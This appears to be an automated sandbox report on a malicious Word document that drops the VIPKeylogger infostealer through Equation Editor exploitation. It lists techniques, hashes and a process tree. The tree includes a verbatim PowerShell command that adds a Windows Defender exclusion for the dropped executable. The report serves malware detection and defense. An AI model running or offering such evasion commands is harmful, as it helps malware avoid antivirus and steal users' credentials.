Analysis

  • max time kernel
    132s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    03-10-2024 07:09

General

  • Target

    KBGC_1200O000000_98756.docx

  • Size

    264KB

  • MD5

    da3b3b9590907c35f64e830b2b244ffd

  • SHA1

    8393b61a2871bc1ea9cb2c22fa041790ce8fa5b1

  • SHA256

    97a4fe736ddd0955e218e7f7fb00d2fddee7896db60aa90e175b4824c9192825

  • SHA512

    98d070881920985daa43a793dd5064a4262584f61c34d86d0b51ff9c395ff81712e192b34cef6a1fedb3a274e214f38725b14fdb93aede811043b976ba6a3cf1

  • SSDEEP

    6144:AyrTTW+ch8x2ZpfRkdxyl+cOpFVozXHN5dOP:Dwy2O1c0buXHNXc

Malware Config

Extracted

Family

vipkeylogger

Credentials

Signatures

  • VIPKeylogger

    VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Abuses OpenXML format to download file from external location
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\KBGC_1200O000000_98756.docx"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2268
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2668
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:3024
      • C:\Users\Admin\AppData\Roaming\wealtken20309.exe
        "C:\Users\Admin\AppData\Roaming\wealtken20309.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:972
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\wealtken20309.exe"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2556
        • C:\Users\Admin\AppData\Roaming\wealtken20309.exe
          "C:\Users\Admin\AppData\Roaming\wealtken20309.exe"
          3⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • outlook_office_path
          • outlook_win_path
          PID:2124

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{ACEBAEC4-765A-4237-BF1B-963978C098F2}.FSD

      Filesize

      128KB

      MD5

      6525ff48244a83bf4b4caf12d062272a

      SHA1

      c28ff4daba8e7c6a2a03c092add29b788435cab2

      SHA256

      85e63fdaef9a9863578d0606d1d20257919356a91c9f7957226533d87579fcb2

      SHA512

      8ac4e911ec575c78d60039c5209bd3df848d9aa26271c246642dff6a30edd0958d3a7ad53c2e337f6173409364cb9392c89483fff679cdd66220638fdd452775

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

      Filesize

      128KB

      MD5

      7ddb1ecbe2119fe34d556e66113a03ef

      SHA1

      508ae02a1796d7d67c7f3e0bb094245d3524979a

      SHA256

      2c42f15b5b634a9b374b0b944768b2bc53d0243e5d99f15080f3d18014743d56

      SHA512

      d4f6508f0783bb41a1c556915e0338082c17630e49f04a35cbd1dbc8e0969752c75172ce931a3c7278ae434aa16d988e231d70bea0fb0bdec855b15948cf3f62

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{5985D274-E8CA-4149-AED2-A4A0F961D17E}.FSD

      Filesize

      128KB

      MD5

      f1dabd1b0c1aa59a585b142abec129c5

      SHA1

      e2bd67f6359d59c9b70e6f9e5bf1861c93f86495

      SHA256

      ab3951c530f7dfbb45896efe50a189610a17f94d495b7bd90e4f03fec5217427

      SHA512

      c53b858a095299f6e665bc99b5e1ca1b672fea19727f97a20a1395b041da372155a03c3005b3feba3babfbb25fb096c73882bb3c022c6f46f6c59d7101069313

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AS91FDNI\wealthzxcv[1].doc

      Filesize

      565KB

      MD5

      adbffccbb78834fa492cc7ca8a676e52

      SHA1

      1e5b065d13fa03fb556a7ff315b85db96d369908

      SHA256

      42d08df15b74f7a598895de1590dab57cd973d1b4dd8531f88ac3150260f7e63

      SHA512

      de1bb84f11ad4dcf7035699c8b5ca58e098da937a98b8a701ba202671dbb9bf1510434682675b208f3dc804040a9775b11903709f825758e68a19fc9ef2e8b33

    • C:\Users\Admin\AppData\Local\Temp\{71085DCC-B725-4F89-B6AD-E380E016AB80}

      Filesize

      128KB

      MD5

      2d292830ca43ddc1dae746b5b1b3f449

      SHA1

      9d66599e5cdc2b06a96530612fb5cffd192ea0ac

      SHA256

      5248e86bb707bbad937d704882ea503d31eec59e3255bcfd6e82fd3fe3be35bd

      SHA512

      d4fea9c51e1eedb92edc3214971818e9d964ea26600cf75c7597f007784172c5a646e1ce8b11cbf4ce77da952e52a08e18fa2364a67904c074256e33c2f9ae69

    • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

      Filesize

      2B

      MD5

      f3b25701fe362ec84616a93a45ce9998

      SHA1

      d62636d8caec13f04e28442a0a6fa1afeb024bbb

      SHA256

      b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

      SHA512

      98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

    • \Users\Admin\AppData\Roaming\wealtken20309.exe

      Filesize

      858KB

      MD5

      d237ebe34f35a9ffe99f5efe0474c1e2

      SHA1

      573c4774a52cc9ebc7e7408f944ac7f3a27d2fb1

      SHA256

      ebf5271d5f3a9a052cd487e949d80ca43d84bb108dd0cf0c773f2139a57c6137

      SHA512

      9393d9605d72382f7dc154e0dfc7aacd7f0f740c0c3ec7fc3e94a366111edbbb1ca2f64b85cd9f12bd7bccad25d74ed16cff19162b44b95127e61ccc227b9f05

    • memory/972-96-0x0000000000510000-0x000000000052E000-memory.dmp

      Filesize

      120KB

    • memory/972-104-0x00000000001C0000-0x000000000024A000-memory.dmp

      Filesize

      552KB

    • memory/972-94-0x0000000001300000-0x00000000013DC000-memory.dmp

      Filesize

      880KB

    • memory/2124-116-0x0000000000400000-0x0000000000448000-memory.dmp

      Filesize

      288KB

    • memory/2124-105-0x0000000000400000-0x0000000000448000-memory.dmp

      Filesize

      288KB

    • memory/2124-113-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

      Filesize

      4KB

    • memory/2124-117-0x0000000000400000-0x0000000000448000-memory.dmp

      Filesize

      288KB

    • memory/2124-114-0x0000000000400000-0x0000000000448000-memory.dmp

      Filesize

      288KB

    • memory/2124-111-0x0000000000400000-0x0000000000448000-memory.dmp

      Filesize

      288KB

    • memory/2124-109-0x0000000000400000-0x0000000000448000-memory.dmp

      Filesize

      288KB

    • memory/2124-107-0x0000000000400000-0x0000000000448000-memory.dmp

      Filesize

      288KB

    • memory/2268-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2268-103-0x0000000070C5D000-0x0000000070C68000-memory.dmp

      Filesize

      44KB

    • memory/2268-0-0x000000002F8D1000-0x000000002F8D2000-memory.dmp

      Filesize

      4KB

    • memory/2268-2-0x0000000070C5D000-0x0000000070C68000-memory.dmp

      Filesize

      44KB